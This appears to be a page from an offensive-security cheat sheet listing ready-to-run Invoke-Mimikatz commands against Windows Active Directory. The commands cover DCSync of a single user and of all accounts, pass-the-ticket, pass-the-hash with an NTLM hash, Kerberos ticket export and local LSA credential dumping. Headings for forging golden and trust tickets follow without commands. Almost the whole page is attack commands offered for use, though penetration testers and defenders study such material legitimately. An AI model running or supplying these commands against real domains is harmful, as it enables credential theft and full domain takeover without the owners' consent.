Mimikatz
DCSync
Invoke-Mimikatz -Command '"lsadump::dcsync /user:DOMAIN\USER"'
Invoke-Mimikatz -Command '"lsadump::dcsync /all"'
# When DCsyncing and other actions you need to know the short hand of the domain.
# This can be found with Translate-Canonical
https://gist.github.com/HarmJ0y/4226349db644e6549605Pass-The-Ticket
Invoke-Mimikatz -Command '"kerberos::ptt TGS_ticket_file.kirbi"'Pass-The-Hash
Invoke-Mimikatz -Command '"sekurlsa::pth /user:Administrator /domain:DOMAIN.local /ntlm:<ntlmhash> /run:powershell.exe"'Extract Tickets
Invoke-Mimikatz -Command '"kerberos::list /export"'Dump Local Creds
Invoke-Mimikatz -Command '"lsadump::lsa /patch"'Extract Trust Keys
Forge Golden Ticket
Forge Inter-Domain Trust Ticket
Forge Inter-Forest Trust Ticket
Last updated
Was this helpful?